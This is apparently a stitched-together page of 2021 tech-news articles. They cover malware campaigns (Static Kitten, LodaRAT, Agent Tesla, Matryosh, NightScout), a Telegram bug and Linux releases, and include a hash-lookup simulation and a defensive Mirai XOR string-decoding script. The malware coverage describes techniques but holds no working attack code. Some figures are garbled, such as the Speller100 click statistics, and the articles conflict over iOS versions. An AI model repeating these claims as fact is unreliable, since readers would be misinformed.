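        return "blocked" if h in matches else "safe"


def find_prefix_collision(target_prefix: bytes, prefix_len: int,
                          host: str = "benign.example") -> str:
    """Brute-force a harmless expression whose hash shares the target prefix,
    showing that a prefix hit alone is not a verdict (use a short prefix)."""
    i = 0
    while True:
        expr = f"{host}/page{i}"
        if full_hash(expr)[:prefix_len] == target_prefix:
            return expr
        i += 1


if __name__ == "__main__":
    provider = ListProvider(["evil.example/prize"])
    browser = Browser(provider, device_ip="203.0.113.7")
    print(browser.check("https://EVIL.example/prize?x=1#frag"))  # blocked
    print(browser.check("https://good.example/"))  # safe, no request made
    print(provider.requests_seen)  # one (prefix, IP) pair: the leak the proxy hides
```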

Additional privacy measures Apple will be rolling out

As part of App Tracking Transparency in iOS 14.5, Apple will also require apps to request users' permission before tracking them across other apps and websites using the device's advertising identifier.

The new anti-tracking features are seen as a big hit to the ad revenue of internet marketers and of companies that rely on cross-device user tracking, and the ad revenue it generates, to keep offering free services.

Fraudulent Website Alert coming to Safari browser with iOS 14.5 update

ConnectWise Control, formerly known as ScreenConnect, is a self-hosted remote desktop application with support for automatic access and the ability to hold meetings with screen-sharing capabilities.

A state-sponsored hacking group called Static Kitten (also known as Seedworm, MERCURY or MuddyWater), believed to be working at the behest of Iran's primary intelligence and military service, the Islamic Revolutionary Guard Corps, is behind attacks on UAE and Kuwait government agencies in a new cyberespionage campaign.

According to Anomali Threat Research, the campaign uses tactics, techniques, and procedures (TTPs) consistent with known Static Kitten activity; the ConnectWise Control parameters were designed to target the Ministry of Foreign Affairs (MOFA) of Kuwait, with mfa[.]gov appearing in the custom field.

How were the attacks on UAE and Kuwait government agencies tied to Static Kitten?

In October 2020, Static Kitten reportedly conducted Operation Quicksand, which targeted prominent Israeli organizations and also made use of the file-storage service OneHub. In the current campaign, Anomali discovered samples masquerading as the UAE National Council and the Kuwaiti government respectively, based on references within the malicious samples.



The lure ZIP files used by Static Kitten were designed to trick users into downloading a report purportedly about relations between Arab countries and Israel, or about scholarships. The URLs distributed in these phishing emails direct recipients to a file-storage location on OneHub, a service Static Kitten is known to have used before.

Anomali Threat Research also identified that Static Kitten has continued to use OneHub to host files containing ScreenConnect.

The rise of legitimate software used for malicious purposes

Static Kitten has been using features of ScreenConnect to steal sensitive information or download malware for its cyberespionage operations. The use of legitimate software for malicious purposes is on the rise, as it is an effective way for threat actors to disguise their operations.

In this latest campaign Static Kitten is focused on cyberespionage, and data theft is very likely the primary objective behind distributing ScreenConnect.

Hackers using ConnectWise Control to Spy on Middle East targets

Telegram messages aren't end-to-end encrypted by default, unless the user explicitly enables a device-specific feature called "secret chat", which also keeps the data encrypted on Telegram's servers.

Security researcher Dhiraj Mishra discovered a bug in Telegram version 7.3, which has since been fixed in version 7.4, released on January 29. The privacy bug resides in the macOS app and makes it possible to access self-destructing audio and video messages long after they have disappeared from a secret chat.

Although Telegram has several security and privacy measures, it has once again fallen short in securing users' data.

How self-destructing media files remain on the device after a secret chat ends

When a Telegram user records and sends a video or audio message in a regular chat, the app reveals the exact path where the message is stored as an ".mp4" file. With the secret chat option turned on, the path is not shown, but the recorded message is still stored in the same location.



The recipient of a self-destructing message in a secret chat therefore still has the media file accessible on the system even after the message has disappeared from the chat screen.

In the proof-of-concept video, the user receives a self-destructing message in a secret chat, and the file remains stored after the message has self-destructed. The macOS version of the app is the one affected; it also stored the local passcode in plain text. Both vulnerabilities were patched in version 7.4 (212543) Stable, and a €3,000 bounty was awarded to Dhiraj Mishra.

What Telegram users should do about the vulnerabilities

If you use Telegram on macOS and care about your privacy, update the app now to Telegram version 7.4 (212543) Stable, but bear in mind that group chats still offer no end-to-end encryption and that default chat histories are stored on Telegram's servers.

If you want a truly private group chat, consider Signal Messenger as an alternative, where all chats are end-to-end encrypted. Despite these privacy shortcomings, Telegram still reached a milestone of 500 million monthly active users in January.

Telegram Bug leaves Self-Destructing Audio and Video messages on Device

Java Development Kit (JDK) 16 is due for release in March 2021, and the next upgrade, Java 17, has already started to take shape with a proposal for enhanced pseudo-random number generators (PRNGs).

The proposal for JDK 17 would provide new interface types for PRNGs, including jumpable PRNGs, and implementations of an additional class of splittable PRNG algorithms (LXM).

The new interface, dubbed RandomGenerator, would provide a uniform API for all new and existing PRNGs.

What's the goal of the enhanced pseudo-random number generators?

The goal is to improve several areas of pseudo-random number generation in Java; the effort does not call for implementations of numerous additional PRNG algorithms.



With four specialized RandomGenerator interfaces to be provided, the overriding goals of the plan include:

  • Eliminating code duplication in existing PRNG classes
  • Providing streams of PRNG objects with improved support for stream-based programming
  • Using various PRNG algorithms interchangeably in applications with ease


The existing behavior of the java.util.Random class is preserved, while three common algorithms that are already widely deployed in other programming-language environments have been added.

What features to expect in JDK 17?

The main features proposed for JDK 17 include the foreign linker API, the foreign-memory access API and the vector API, all currently in the incubator stage in JDK 16. Sealed classes, in their second preview in JDK 16, could also become generally available in JDK 17.

Developers who want early-access open-source builds of JDK 17 can get them at jdk.java.net. Note that JDK 17 is not due until September; as the next long-term-support (LTS) release it will receive several years of support, whereas other Java releases are feature releases supported for only six months.

JDK 17: Java 17 proposal of enhanced Pseudo-random number generators

The Loda remote access Trojan (RAT), formerly Windows-only malware, has expanded its scope to Android devices in pursuit of the attackers' credential-stealing goals.

According to researchers at Cisco Talos, a new iteration of LodaRAT with improved sound-recording capabilities has been identified in an ongoing hybrid campaign targeting Bangladeshi users that started in October 2020. The malware is typically delivered via phishing lures and can record audio and video and capture other sensitive data; the new variants also aim at stealing users' passwords via browser cookies.

Along with the new LodaRAT for Android variant, there is an updated version of Loda for Windows identified in the same campaign.

What has changed in the new variants of LodaRAT for Windows and Android?

The latest variants, Loda4Android and Loda4Windows, are closely related and share a set of data-gathering features that amount to an espionage application.



The Android variant differs from other Android malware in that it avoids some common techniques employed by banking Trojans, such as abusing the Accessibility APIs to record users' on-screen activity. It can nevertheless take photos and screenshots, read and send SMS messages, initiate calls to specific numbers, and intercept phone calls.

The Windows counterpart comes with new commands that give the operators remote access to the target machine via Remote Desktop Protocol (RDP), and commands that use the BASS audio library to capture audio from connected microphones. Several existing Loda commands have been updated and some are entirely new, the most notable being the RDP remote-access command.

The malware also has a command-and-script execution capability that gives it the flexibility to perform a range of tasks, such as downloading available Android exploits to obtain root access, or downloading and installing a new APK.

How to safeguard against such Android banking Trojans

LodaRAT is diversifying its target platforms and continuously improving its capabilities. The threat actor is focusing on specific targets and deploying cross-platform malware with additional capabilities, which suggests they have their eyes on larger organizations.

Windows and Android users are therefore advised to be vigilant when clicking on or opening links received via email or SMS. Note also that the attackers used squatted domains that resemble the real ones, to lure users in without their noticing.

LodaRAT now Targets Android with Credential-stealing capabilities

Finnix is a Debian GNU/Linux based Live CD operating system, intended for use by system administrators for such tasks as network monitoring, filesystem recovery and OS installation.

The Finnix team has announced a new version of the distro, Finnix 122, with new packages, security fixes, and several feature updates. It follows version 121, which was built on Debian 11 “bullseye”; version 122 is likewise based on the Debian 11 testing distribution, with the latest long-term support (LTS) Linux kernel 5.10.

What's New in Finnix 122 Release?



Finnix 122 features the latest long-term support (LTS) Linux Kernel 5.10, including a number of fixes, new packages and new features, as follows:



  • Wireless-regdb
  • iozone3 (finnix/finnix#8)
  • Wifi-connect helper script added
  • USB flash drive boot compatibility improvements on older BIOSes
  • Manpage cache generated for man -k/apropos (finnix/finnix#9)
  • Increased boot splash timeout from 15 seconds to 30 seconds
  • Redesigned boot splash screen


The Finnix 122 ISO has shrunk from 509 MB to 411 MB, and boot speed has improved. A new finnix command has been added to help users get started with the operating system.

How to Download or Upgrade to Finnix 122



New users who want to try out Finnix 122 can download the ISO image from the official download page. Note that it is available only for 64-bit architectures, across several platforms including User Mode Linux, x86, PowerPC, and Xen.

However, if you are running a 32-bit 586/686/PowerPC system, you can only use older versions of Finnix.

Finnix 122 Release: Debian-based LiveCD Linux Distro for System Administrators

Microsoft has launched Speller100, a set of large-scale multilingual spelling-correction models for Bing Search worldwide with high precision and high recall in over 100 languages.

According to Microsoft, about 15% of queries submitted to Bing contain misspellings. When a query is misspelled, the search engine matches the wrong set of documents and triggers incorrect answers, producing a sub-optimal results page for web searchers.

Speller100 is meant to correct this by improving misspelling handling in many more languages from around the world, with the help of Microsoft's AI at Scale initiative.

How will Speller100 improve Bing searches in more than 100 languages?

Microsoft's large-scale multilingual spelling-correction models, collectively called Speller100, achieve high precision and high recall in over 100 languages and are meant to improve search results in Bing.



It is a huge step forward for search generally, considering that spelling correction has so far been available for only a few dozen languages. Speller100 leverages advances in AI, particularly zero-shot learning coupled with carefully designed large-scale pretraining tasks, together with theories from historical linguistics.

Speller100 builds on the concept of language families, exploiting the similarities shared by related languages, and on zero-shot learning, which allows a model to accurately correct spelling in a language without additional language-specific labeled training data.

The models are trained with tasks such as masked language modeling (MLM), next-sentence prediction, and translation. Although the commonly used WordPiece or SentencePiece subword segmentation algorithms break words down into smaller constituents, existing pretraining tasks operate at the word, phrase, or sentence level for semantic understanding.

How will this major AI leap help Bing search better?

Speller100 is perhaps the most comprehensive spelling-correction system so far in terms of the number of languages covered and overall accuracy. By extending accurate spelling correction to over 100 languages, it should make search results more accurate for all Bing users.

Analysts have in fact postulated a double-digit improvement in both spelling-correction precision and recall, and comprehensive online A/B testing in Bing showed the following: the number of times users clicked on an item on the search page went from single digits to 70%, and the overall number of pages with no results fell by 30%.

Bing Speller100: Zero-shot Search Spelling Correction at Scale

The Agent Tesla remote access Trojan (RAT) acts as spyware, keylogger, and data stealer; it is written for Microsoft's .NET platform (in C# and VB.NET) and has been operational since 2014.

According to security researchers at Sophos, Agent Tesla now employs new delivery and evasion techniques to get around endpoint security and other defenses. Where the Trojan formerly relied on social-engineering lures, the Windows spyware now targets Microsoft's Antimalware Scan Interface (AMSI) to get past endpoint protection software.

It also employs a multi-stage installation process and uses Tor and the Telegram messaging API to communicate with its command-and-control (C2) server, which helps it evade detection.

How does Agent Tesla bypass sandbox defenses and malware scanners?

SophosLabs has been tracking Agent Tesla and the multiple actors using the malware, including in the recent RATicate campaigns.

The researchers found new variants in a growing number of attacks; as recently as December 2020, Agent Tesla accounted for about 20 percent of the email phishing attacks detected in Sophos customer telemetry. The variants are tagged Agent Tesla v2 and v3, with the key differences between them being the additional C2 options in v3 and its improved success rate against security defenses.

The multi-stage installation process has also received a significant upgrade: the first-stage downloader now attempts to modify code in the Antimalware Scan Interface (AMSI) so that second-stage malicious payloads, such as those fetched from Pastebin, are not scanned.

How IT admins can safeguard against Agent Tesla



Agent Tesla spreads mainly via email attachments, so organizations are advised to deploy an intelligent security solution that can detect and block suspicious emails and attachments before they reach employees' inboxes.

Organizations should also implement recognized email authentication standards to verify that messages are what they claim to be, while continually educating employees on how to spot suspicious emails and what to do when they encounter such maliciously crafted messages.

Evasion Techniques employed by Agent Tesla to bypass Endpoint Security

The stable Mageia 8 release is still some way off, but the latest update, Mageia 8 RC1, brings several core package updates.

Mageia 8 Alpha 1 was made available in July 2020 to early testers to help with the development of the final release, with large-scale updates to core packages as well as features improving on what Mageia already offered; the final release, initially scheduled for September 18, has however slipped past its estimated date.

Nonetheless, the first release candidate (RC1), announced on February 6, shows that Mageia 8 development, though slow, is still progressing.

What's New in Mageia 8 RC1



Mageia 8 RC1 brings the latest Linux kernel 5.10.12 LTS and updated desktop environments such as Xfce 4.16, MATE 1.24 and Plasma 5.20.4. It uses the new GLVND (GL Vendor Neutral Dispatch), which allows Mesa and any other third-party GL drivers to be installed in parallel, improving performance and support for hybrid GPU configurations.

Mageia 8 RC1 has also updated the Java stack to version 11, with Java 8 support removed (though users can still work with Java 8). Other core package updates in Mageia 8 RC1 include:

  • LibreOffice 7.0.4.2
  • Chromium 88 (x86_64-only)
  • Python 3.8.5, Rust 1.48.0, Ruby 2.7.2
  • GCC 10.2.1, LLVM 10.0.1
  • Cinnamon 4.8.3
  • Systemd 246


Mageia 8 RC1 also improves the Netinstall ISO image, which now allows installation over Wi-Fi connections using WPA encryption.

How to Download Mageia 8 RC1



If you want to give Mageia 8 RC1 a spin, you can download the torrent file or ISO image here. It offers installation media for both 32-bit and 64-bit systems, with 64-bit live images for Plasma, GNOME and Xfce, as well as a 32-bit live image for Xfce.

As always with pre-release images, do not install it on your main system, and use your best judgement.

Mageia 8 Update: Release Candidate 1 (RC1) out with new GLVND support

Apple's new iOS 14.4 privacy policies are generating a lot of furore in online advertising circles, especially as regards targeted advertising.

Apple also introduced a number of countermeasures with the iOS 14.4 update, such as the new sandboxed 'BlastDoor' service, which is responsible for almost all parsing of untrusted data in iMessage. BlastDoor forms the core of the new security protections coming to the iPhone: all inbound messages are processed in a secure, sandboxed environment, preventing a maliciously crafted message from interacting with the operating system to access user data.

Besides these security enhancements, Apple's new anti-tracking features are seen as a big hit to the ad revenue of internet marketers and of companies that rely on cross-device user tracking, and the resulting ad revenue, to keep offering free services.

How does the anti-tracking feature in the iOS 14.4 update work?

The new anti-tracking feature in iOS 14 will inform iPhone users when an app wants to track their activities; each app has to explicitly ask the user for permission to track them before it may do so.

iPhone users will see a pop-up notification asking for tracking permission when they open the app, and the app must explain what it uses the data for, so that the user is well informed before granting permission. App Tracking Transparency in iOS 14.4 means that every app will have to ask for your permission first.

With the introduction of App Tracking Transparency, Apple aims to give users the freedom to choose whether any app may track their activities.

Why does the future look bleak for targeted advertising?

Even Google, whose revenue depends solely on the ad business, is looking to bring an anti-tracking feature to Android, albeit with less policing than Apple's iOS update.

Recently the company announced a monumental change to its Chrome browser, which over the course of the next two years will phase out support for third-party cookies. The prospect of the cookie crumbling has raised a lot of argument among advertisers and publishers, as it will heavily impact online marketing.

If third-party cookies are wiped out in Chrome, online advertisers in the programmatic ecosystem will be unable to personalize or serve targeted ads to almost half of their audience, as statistics point to about two billion installations and one billion people using the browser each month.

Apple’s iPhone Anti-tracking features in the iOS 14.4 update

The EndeavourOS team has announced its first release of 2021, EndeavourOS 2021.02.03, which follows the regular desktop version 2020.09.19.

The team also recently announced a new project offering EndeavourOS for ARM computers; similar to the relationship between EndeavourOS x86_64 and Arch Linux, EndeavourOS ARM aims to provide the same experience on devices running ARM (Acorn RISC Machine) based processors.

EndeavourOS 2021.02.03 comes with improvements such as an updated live environment and an updated offline install option, which now installs the latest fully themed Xfce 4.16 desktop.

What's New in EndeavourOS 2021.02.03 Release?



EndeavourOS 2021.02.03 updates the core software to the latest versions, such as Linux kernel 5.10.11.arch1-1, Nvidia 460.39-2, Mesa 20.3.4-1, Firefox 85.0-1, and Calamares 3.2.34-10.

Besides the updated offline option, which now installs the latest fully themed Xfce 4.16 desktop, EndeavourOS 2021.02.03 also adds several new features:

  • Welcome app now supports Brazilian Portuguese
  • GVFS packages are now only installed when a GTK environment is chosen
  • Reflector-bash-completion added to make the use of Reflector easier
  • For online installs, mirrors are updated automatically for a faster install and fewer unresponsive mirrors
  • Packages installed were reordered and extended to improve filesystem support on GTK and Qt environments
  • Qt environments now have kio-fuse, kio-gdrive and audiocd-kio installed by default
  • Alacritty added as one of the supported terminals for the native apps
  • Reflector-auto removed, since Reflector now ships it by default


There is also a new Welcome option, --pkglist=URL, for adding extra packages during installation from a user_pkglist.txt file; the same file can be found as user_pkglist.txt in the live user's home directory, where users can edit it to install additional packages.

How to Download or Upgrade to EndeavourOS 2021.02.03



If you're a new user and want to try out the latest EndeavourOS 2021.02.03, you can get the ISO image from here.

As a first-time user you'll need a fresh installation from the latest ISO image. If you encounter any issues, official installation instructions are available here.

EndeavourOS 2021.02.03 Release brings Latest fully themed Xfce 4.16 desktop

A new botnet dubbed "Matryosh" is leveraging Android devices to build a network whose primary purpose is carrying out distributed denial-of-service (DDoS) attacks.

According to Qihoo 360's Netlab researchers, Matryosh reuses the Mirai botnet framework and propagates via exposed Android Debug Bridge (ADB) interfaces to infect Android devices. ADB is a command-line tool in the Android SDK that allows developers to debug apps and handles communication with Android devices.

Although ADB is turned off by default on most Android devices, some vendors ship with it enabled, which allows attackers to connect remotely and leaves the devices open to exploitation.

How Matryosh DDoS Botnet targets Android-Based Devices



First, Matryosh decrypts the remote hostname and issues a DNS TXT request to obtain the Tor C2 address and a Tor proxy; it then connects to the Tor proxy and communicates with the Tor C2 server through it to receive further instructions.

It propagates via ADB; the captured payload's main function is to download and execute scripts from the remote host. Both the encryption algorithm implemented in Matryosh and the process of obtaining the C2 are nested in layers. The botnet stands out from similar campaigns in using Tor to mask its activities and funnel commands from the attacker-controlled server through the network.

Matryosh also stores sensitive resources in encrypted form to prevent the relevant functions from being spotted by security researchers.

Efforts to thwart Matryosh DDoS Botnet from Spreading



Matryosh's cryptographic design follows the Mirai single-byte XOR pattern, which makes it easy for antivirus software to flag it as Mirai; but the changes at the network level indicate that its authors wanted to protect the C2 by downloading the configuration from the cloud, which complicates static analysis.
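To illustrate why the single-byte XOR pattern is so easy to flag, here is an added example (not Netlab's analysis code or the malware's own) that recovers the key of a Mirai-style obfuscated string table by trying all 256 keys and scoring each candidate against known plaintext tokens. The sample table is constructed; the key derivation follows the leaked Mirai source, where each byte is XORed with the four bytes of a 32-bit key in turn, which collapses to one byte.

```python
import string

# Strings that appear in Mirai-derived tables, used here as known plaintext.
KNOWN_TOKENS = (b"/bin/busybox", b"/proc/", b"shell", b"enable", b"assword")
PRINTABLE = set(string.printable.encode("ascii")) | {0}  # NUL separates entries


def effective_key(table_key: int) -> int:
    """Mirai's toggle_obf() XORs every byte with k1, k2, k3 and k4 in turn,
    so the 32-bit key reduces to the single byte k1 ^ k2 ^ k3 ^ k4."""
    return (table_key ^ (table_key >> 8) ^ (table_key >> 16) ^ (table_key >> 24)) & 0xFF


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; the same routine obfuscates and deobfuscates."""
    return bytes(b ^ key for b in data)


def score(candidate: bytes):
    """Rank a candidate plaintext: known-token hits first, printable ratio second."""
    hits = sum(candidate.count(tok) for tok in KNOWN_TOKENS)
    printable = sum(b in PRINTABLE for b in candidate) / max(len(candidate), 1)
    return (hits, printable)


def recover_key(blob: bytes) -> int:
    """Brute-force the single-byte key; 256 trials is all a scanner needs."""
    return max(range(256), key=lambda k: score(xor_bytes(blob, k)))


def split_table(plain: bytes):
    """Split a NUL-separated string table into its entries."""
    return [entry.decode("ascii", "replace") for entry in plain.split(b"\x00") if entry]


def analyse(blob: bytes):
    """Return the recovered key and the decoded table entries."""
    key = recover_key(blob)
    return key, split_table(xor_bytes(blob, key))


# Constructed sample: a NUL-separated string table obfuscated with the key the
# Mirai source derives from its table_key 0xdeadbeef. Not taken from any real sample.
SAMPLE_TABLE = b"\x00".join(
    [b"/bin/busybox", b"/proc/", b"enable", b"shell", b"assword", b"listening tun0"]
)
SAMPLE_BLOB = xor_bytes(SAMPLE_TABLE, effective_key(0xDEADBEEF))

if __name__ == "__main__":
    key, entries = analyse(SAMPLE_BLOB)
    print(hex(key), entries)  # 0x22 and the six table entries
```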

Placing all remote hosts under the same second-level domain (SLD) is not optimal and might change; Qihoo 360's Netlab researchers have promised to keep an eye on it. All the related domains have been blocked by their DNSmon system.

New DDoS Botnet Spreading via Android devices

Solus is an independently developed Linux distribution for the x86-64 architecture that offers its homegrown Budgie desktop, GNOME, MATE or KDE Plasma as the desktop environment.

The Solus team has now released a new version in the Solus 4 ‘Fortitude’ series, Solus 4.2, which follows version 4.1 with updates to the software stacks, multimedia, and hardware enablement.

Solus 4.2 ships different audio and video playback software out of the box for each edition: the Budgie, GNOME, and MATE editions come with Rhythmbox for audio playback, MATE ships VLC for video playback, and KDE Plasma ships Elisa for audio playback and SMPlayer for video playback.

What's New in Solus 4.2 Release?



Solus 4.2 ships with Linux kernel 5.10.12, which provides support for a range of newer hardware, including AMD Ryzen 5th generation processors and Intel Comet Lake CPUs such as the Intel Core i9-10850K.

Solus 4.2 also ships the latest Budgie 10.5.2, the GNOME 3.38 stack (3.38.3), MATE 1.24, Plasma Desktop 5.20.5, KDE Frameworks 5.78, KDE Applications 20.12.1 and Qt 5.15.2, which bring many new features. Other new features and hardware capabilities include:

  • Support for Solarflare NICs
  • Improved exFAT file system support
  • Enabled ACPI and HID ambient light sensors
  • Realtek 8723DE and 8821CD PCI wireless network adapters
  • Support for setup / unlock / lock Locking ranges for SED devices using the Opal protocol
  • Enabled various modules required for software such as CTParental, Mininet, and ROCm
  • Several new USB cameras
  • XFS Online Repair


Mesa has been upgraded to 20.3.3, bringing support for new GPUs, Vulkan 1.2 API support and numerous fixes for the latest gaming titles, and the ACO shader compiler is now enabled by default for the RADV Vulkan driver.

How to Download or Upgrade to Solus 4.2



If you wish to try out the latest release of Solus v4.2, you can download the ISO image of your chosen edition here.

You can follow the installation guide to determine what software to use to burn or write the Solus ISO to a DVD or USB drive. If your system is UEFI-enabled, it is recommended that you follow the UEFI guide.

Solus 4.2 Release: Updated Budgie, GNOME, MATE and KDE Plasma

Microsoft has opened Azure Quantum, its cloud ecosystem for building quantum computing applications, to the public for use in a preview phase.

Microsoft has been building a full software stack to give developers a chance to learn quantum programming; its Q# language (pronounced “q sharp”) and simulator, first announced in 2017, are intended to carry over the functions, variables, and branches of traditional programming.

Quantum computing is a relatively new field in which algorithms are built by wiring up logic gates, drawing on concepts such as vector and matrix mathematics, the qubit, Dirac notation, Pauli measurements, and quantum circuits.

Free trial for Azure Quantum cloud service



Microsoft announced on February 1 that the Azure Quantum cloud service would be available as a free trial, with developers, researchers, and other integrators able to use the platform to build solutions leveraging its tools in a trusted public cloud.

The key component of the platform is Microsoft's open-source Quantum Development Kit with the Q# language for quantum programming, while Microsoft's Quantum Intermediate Representation (QIR) serves as a common open-source interface between languages and target quantum computations.

Microsoft looks to partner with Honeywell Quantum Solutions and IonQ to provide the quantum computing hardware. It has already made available a primer on essential quantum computing concepts, along with the Q# development kit, detailed installation instructions and introductory programming tutorials.

Getting Started with Azure Quantum cloud service



Microsoft invites developers to explore the system, which will be offered on a pay-as-you-go basis. Azure Quantum has already been employed for applications such as freight optimization, cancer research, logistics and risk management.

Quantum computing is expected to disrupt many industries once it becomes widely available, and to help solve highly complex problems.

Microsoft opens up Azure Quantum cloud service for public preview

Ubuntu Core is a minimal, containerized version of the Ubuntu Linux distribution designed specifically for IoT and embedded devices; the latest version, Ubuntu Core 20, is based on Ubuntu 20.04 ‘Focal Fossa’ LTS.

Ubuntu Core aims to offer a secure Linux experience for IoT, with security and privacy features such as full disk encryption, secure boot and secure device recovery. Ubuntu Core 20 follows Ubuntu Core 18, released in 2019, while Canonical is already preparing the next regular Ubuntu release, 21.04 “Hirsute Hippo”, scheduled for April 22, 2021.

The regular Ubuntu release uses the traditional Debian package system, whereas Ubuntu Core relies entirely on snap, the universal package management system developed in-house by Canonical.

What's New in Ubuntu Core 20?



Ubuntu Core 20 brings several new security updates and features, with all snaps on Ubuntu Core devices strictly confined and isolated, so that a compromised application cannot infect the whole system.

Among the new security features are secure boot by default and hardware-backed full disk encryption, which protect the confidentiality of data on the device from attackers. Other security enhancements in Ubuntu Core 20 include:

  • Recovery and reinstall mode
  • Recovery mode chooser
  • Full-disk encryption via TPM integration


Additionally, there is support for cloud-init and initial MAAS, with ten years of support for Raspberry Pi (both ARMv7 and ARMv8).

How to Get Started with Ubuntu Core 20



Ubuntu Core 20 is currently available for download as ISO images for x86_64 and ARM hardware, and if you wish to learn more about Ubuntu Core, you can check out the official documentation.

Kindly note that the model definition has been expanded for UC20 devices to include several new options, notably grade and snaps.
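As an added illustration, not taken from the page or from Canonical's documentation, here is the body of a UC20-style model assertion showing where the grade and snaps options sit. The field names follow the core20 model format as I understand it; the snap ids, brand and authority ids and timestamp are placeholders I constructed.

```json
{
    "type": "model",
    "series": "16",
    "authority-id": "PLACEHOLDER_BRAND_ACCOUNT_ID",
    "brand-id": "PLACEHOLDER_BRAND_ACCOUNT_ID",
    "model": "example-uc20-device",
    "display-name": "Example UC20 device (constructed)",
    "architecture": "amd64",
    "base": "core20",
    "grade": "secured",
    "storage-safety": "encrypted",
    "snaps": [
        {
            "name": "pc-kernel",
            "type": "kernel",
            "default-channel": "20/stable",
            "id": "PLACEHOLDER_SNAP_ID_KERNEL"
        },
        {
            "name": "pc",
            "type": "gadget",
            "default-channel": "20/stable",
            "id": "PLACEHOLDER_SNAP_ID_GADGET"
        },
        {
            "name": "core20",
            "type": "base",
            "default-channel": "latest/stable",
            "id": "PLACEHOLDER_SNAP_ID_BASE"
        },
        {
            "name": "snapd",
            "type": "snapd",
            "default-channel": "latest/stable",
            "id": "PLACEHOLDER_SNAP_ID_SNAPD"
        }
    ],
    "timestamp": "2021-02-01T00:00:00+00:00"
}
```

The grade value is the security-relevant knob: "secured" ties the device to secure boot and TPM-backed full disk encryption, "signed" requires store-asserted snaps, and "dangerous" is for development images only; the model body must be signed with the brand key before it can be used to build an image.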

Ubuntu Core 20: Containerized Linux distro for IoT and embedded devices

Operation NightScout, as dubbed by ESET researchers, is a highly-targeted surveillance campaign that involved distributing different malware families through malicious updates to targeted victims in Hong Kong, Taiwan, and Sri Lanka.

According to ESET researchers, the new supply-chain attack targets online gamers via the compromising of the update mechanism of NoxPlayer.

NoxPlayer is developed by Hong Kong-based company named BigNox, with an estimated userbase of more than 150 million in over 150 countries; it allows users to play mobile games on both PC and Mac.

The malware campaign is believed to have started around September 2020, with the attacks continuing until "explicitly malicious activity" in the wild was discovered on January 25, which prompted ESET researchers to report the issue to BigNox.

How the New Supply‑Chain Attack Targets Online Gaming?



The malware campaign is based on compromised software, and the delivered malware exhibits surveillance capabilities, which is believed to indicate an intent to collect intelligence on targeted victims in the gaming community.



The NoxPlayer update mechanism serves as the vector that delivers the trojanized version of the software, which upon installation distributes three different payloads, including Gh0st RAT, which spies on victims, captures keystrokes, and gathers other sensitive information.

There were also instances where malware binaries such as PoisonIvy RAT were downloaded by the NoxPlayer updater from remote servers under the control of the threat actors.

The malware loaders employed in the attack share similarities with those used in a breach of a Hong Kong university in 2020. ESET claims the operators behind the attack were responsible for breaching BigNox's infrastructure, as evidence suggests that its API was compromised.

How NoxPlayer users can Safeguard their Systems



NoxPlayer users who are uninfected are advised to refrain from downloading updates until BigNox has fixed the vulnerabilities and notified users that the security threat has been mitigated.

Furthermore, as a security best practice it is recommended that users uninstall the software to be on the safer side, and in any case of intrusion, users can perform a standard reinstall.

Operation NightScout: New Supply‑Chain Attack Targeting Online Gaming

JingOS is a full-fledged Linux distribution based on Ubuntu, designed for tablets and capable of running Linux apps like Libre Office, VS Code, and many more.

JingOS is inspired by iPadOS, and its iPadOS-like UI and UX, coupled with a Qt/Plasma-based experience, are enough to get anyone excited about the emergence of this Ubuntu-based distro, which users can now try out in some hands-on experimentation.

The first public version 0.6 of JingOS is now available for download, albeit this version is intended for use by early-adopters, willing testers, and developers only.

What features are available for the JingOS v0.6 first public preview?



The JingOS v0.6 first public preview comes with a raft of KDE applications preinstalled, including the KDE terminal app Konsole, the Dolphin file manager, WPS Office, a camera utility and the Chrome browser.



The core JingOS desktop and basic control centre are also present in the preview version, and there is a notification hub, task manager, and bespoke apps created exclusively for JingOS, such as a calendar app, photos app and voice memo tool.

The obvious drawbacks include the fact that there are a tonne of missing apps and features, with touchpad and touchscreen gestures only available on the Surface Pro 6 and Huawei Matebook 14, the two reference platforms supported by JingOS at present.

Also, there is no built-in update mechanism, versions of utilities like the system settings tool and file manager are missing too, and there is no virtual keyboard.

How to Download JingOS v0.6



If you wish to try out JingOS v0.6, you'll need to submit your email to get the download link. You can get more details on this build, a link to the mailing list (which is required to get a download link), and installation instructions (including “how to” get the .iso images working in VirtualBox) on the JingOS forum.

However, the more stable version of JingOS will be available in March, with versions 0.8 and 1.0 scheduled for release on March 31 and June 30, 2021, respectively.

JingOS v0.6 first public preview: New Linux distro designed for tablets